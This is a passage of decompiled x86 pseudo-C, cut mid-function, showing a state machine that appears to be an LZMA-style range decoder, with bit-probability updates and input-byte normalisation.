                                                                                                                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                              											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                              												__ebx = 0;
                                                                                                                                                              												__ebx = 1;
                                                                                                                                                              												goto L61;
                                                                                                                                                              											} else {
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 8);
                                                                                                                                                              												__ebx = 0;
                                                                                                                                                              												__ebx = 1;
                                                                                                                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              												goto L41;
                                                                                                                                                              											}
                                                                                                                                                              										case 7:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                              											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                              												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              												__eax =  *(__ebp - 0x28);
                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              												__eax = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                              												goto L69;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                              											__ecx =  *(__ebp - 0x38);
                                                                                                                                                              											 *(__ebp - 0x84) = 8;
                                                                                                                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              											while(1) {
                                                                                                                                                              												 *(_t613 - 0x54) = _t606;
                                                                                                                                                              												goto L133;
                                                                                                                                                              											}
                                                                                                                                                              										case 8:
                                                                                                                                                              											goto L0;
                                                                                                                                                              										case 9:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												goto L89;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x60);
                                                                                                                                                              											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											}
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                              											__eflags = _t258;
                                                                                                                                                              											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                              											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                              											goto L75;
                                                                                                                                                              										case 0xa:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                              												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x28);
                                                                                                                                                              											goto L88;
                                                                                                                                                              										case 0xb:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												__ecx =  *(__ebp - 0x24);
                                                                                                                                                              												__eax =  *(__ebp - 0x20);
                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              											} else {
                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x28);
                                                                                                                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              											L88:
                                                                                                                                                              											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              											L89:
                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                              											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              											goto L69;
                                                                                                                                                              										case 0xc:
                                                                                                                                                              											L99:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t334 = __ebp - 0x70;
                                                                                                                                                              											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t334;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                                                                                              											goto L101;
                                                                                                                                                              										case 0xd:
                                                                                                                                                              											L37:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t122 = __ebp - 0x70;
                                                                                                                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t122;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											L39:
                                                                                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                                                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                              												goto L48;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                              												goto L54;
                                                                                                                                                              											}
                                                                                                                                                              											L41:
                                                                                                                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                              											 *(__ebp - 0x48) = __eax;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											__eax = __eax << 8;
                                                                                                                                                              											__eax = __eax + __ebx;
                                                                                                                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                              											__edx = __ax & 0x0000ffff;
                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												__cx = __ax;
                                                                                                                                                              												 *(__ebp - 0x40) = 1;
                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx + 1;
                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              												0x800 = 0x800 - __edx;
                                                                                                                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L39;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L37;
                                                                                                                                                              											}
                                                                                                                                                              										case 0xe:
                                                                                                                                                              											L46:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t156 = __ebp - 0x70;
                                                                                                                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t156;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L48:
                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													_t170 = __edx + 1; // 0x1
                                                                                                                                                              													__ebx = _t170;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													continue;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L46;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L54:
                                                                                                                                                              											_t173 = __ebp - 0x34;
                                                                                                                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              											__eflags =  *_t173;
                                                                                                                                                              											goto L55;
                                                                                                                                                              										case 0xf:
                                                                                                                                                              											L58:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t203 = __ebp - 0x70;
                                                                                                                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t203;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											L60:
                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                              												L55:
                                                                                                                                                              												__al =  *(__ebp - 0x44);
                                                                                                                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                              												goto L56;
                                                                                                                                                              											}
                                                                                                                                                              											L61:
                                                                                                                                                              											__eax =  *(__ebp - 0x58);
                                                                                                                                                              											__edx = __ebx + __ebx;
                                                                                                                                                              											__ecx =  *(__ebp - 0x10);
                                                                                                                                                              											__esi = __edx + __eax;
                                                                                                                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                              											__edi = __ax & 0x0000ffff;
                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												__cx = __ax;
                                                                                                                                                              												_t217 = __edx + 1; // 0x1
                                                                                                                                                              												__ebx = _t217;
                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              												0x800 = 0x800 - __edi;
                                                                                                                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L60;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L58;
                                                                                                                                                              											}
                                                                                                                                                              										case 0x10:
                                                                                                                                                              											L109:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t365 = __ebp - 0x70;
                                                                                                                                                              											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t365;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											goto L111;
                                                                                                                                                              										case 0x11:
                                                                                                                                                              											L69:
                                                                                                                                                              											__esi =  *(__ebp - 0x58);
                                                                                                                                                              											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                              											while(1) {
                                                                                                                                                              												 *(_t613 - 0x54) = _t606;
                                                                                                                                                              												goto L133;
                                                                                                                                                              											}
                                                                                                                                                              										case 0x12:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                              												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                              											goto L130;
                                                                                                                                                              										case 0x13:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												_t469 = __ebp - 0x58;
                                                                                                                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                              												__eflags =  *_t469;
                                                                                                                                                              												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                              												 *(__ebp - 0x40) = 8;
                                                                                                                                                              												L144:
                                                                                                                                                              												 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                              												goto L145;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              											 *(__ebp - 0x30) = 8;
                                                                                                                                                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                              											L130:
                                                                                                                                                              											 *(__ebp - 0x58) = __eax;
                                                                                                                                                              											 *(__ebp - 0x40) = 3;
                                                                                                                                                              											goto L144;
                                                                                                                                                              										case 0x14:
                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                              											__eax =  *(__ebp - 0x80);
                                                                                                                                                              											 *(_t613 - 0x88) = _t533;
                                                                                                                                                              											goto L1;
                                                                                                                                                              										case 0x15:
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              											__al = __al & 0x000000fd;
                                                                                                                                                              											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              											goto L120;
                                                                                                                                                              										case 0x16:
                                                                                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                                                                                              											__eflags = __eax - 4;
                                                                                                                                                              											if(__eax >= 4) {
                                                                                                                                                              												_push(3);
                                                                                                                                                              												_pop(__eax);
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											 *(__ebp - 0x40) = 6;
                                                                                                                                                              											__eax = __eax << 7;
                                                                                                                                                              											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                              											 *(__ebp - 0x58) = __eax;
                                                                                                                                                              											goto L145;
                                                                                                                                                              										case 0x17:
                                                                                                                                                              											L145:
                                                                                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                                                                                              											 *(__ebp - 0x50) = 1;
                                                                                                                                                              											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                              											goto L149;
                                                                                                                                                              										case 0x18:
                                                                                                                                                              											L146:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t484 = __ebp - 0x70;
                                                                                                                                                              											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t484;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											L148:
                                                                                                                                                              											_t487 = __ebp - 0x48;
                                                                                                                                                              											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              											__eflags =  *_t487;
                                                                                                                                                              											L149:
                                                                                                                                                              											__eflags =  *(__ebp - 0x48);
                                                                                                                                                              											if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              												__ecx =  *(__ebp - 0x40);
                                                                                                                                                              												__ebx =  *(__ebp - 0x50);
                                                                                                                                                              												0 = 1;
                                                                                                                                                              												__eax = 1 << __cl;
                                                                                                                                                              												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                              												__eax =  *(__ebp - 0x7c);
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													 *(_t613 - 0x88) = _t533;
                                                                                                                                                              													goto L1;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x50);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              											__eax =  *(__ebp - 0x58);
                                                                                                                                                              											__esi = __edx + __eax;
                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                              											__edi = __ax & 0x0000ffff;
                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												__cx = __ax;
                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                              												__eax = __eax - __ecx;
                                                                                                                                                              												__edx = __edx + 1;
                                                                                                                                                              												__eflags = __edx;
                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                              												 *(__ebp - 0x50) = __edx;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              												0x800 = 0x800 - __edi;
                                                                                                                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L148;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L146;
                                                                                                                                                              											}
                                                                                                                                                              										case 0x19:
                                                                                                                                                              											__eflags = __ebx - 4;
                                                                                                                                                              											if(__ebx < 4) {
                                                                                                                                                              												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                              												L119:
                                                                                                                                                              												_t393 = __ebp - 0x2c;
                                                                                                                                                              												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                              												__eflags =  *_t393;
                                                                                                                                                              												L120:
                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                              												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												}
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                              												_t400 = __ebp - 0x60;
                                                                                                                                                              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                              												__eflags =  *_t400;
                                                                                                                                                              												goto L123;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx = __ebx;
                                                                                                                                                              											__eax = __ebx;
                                                                                                                                                              											__ecx = __ebx >> 1;
                                                                                                                                                              											__eax = __ebx & 0x00000001;
                                                                                                                                                              											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                              											__al = __al | 0x00000002;
                                                                                                                                                              											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                              											__eflags = __ebx - 0xe;
                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              											if(__ebx >= 0xe) {
                                                                                                                                                              												__ebx = 0;
                                                                                                                                                              												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                              												L102:
                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              													__eax = __eax + __ebx;
                                                                                                                                                              													 *(__ebp - 0x40) = 4;
                                                                                                                                                              													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													L108:
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													 *(__ebp - 0x58) = __eax;
                                                                                                                                                              													 *(__ebp - 0x50) = 1;
                                                                                                                                                              													 *(__ebp - 0x44) = 0;
                                                                                                                                                              													 *(__ebp - 0x48) = 0;
                                                                                                                                                              													L112:
                                                                                                                                                              													__eax =  *(__ebp - 0x40);
                                                                                                                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
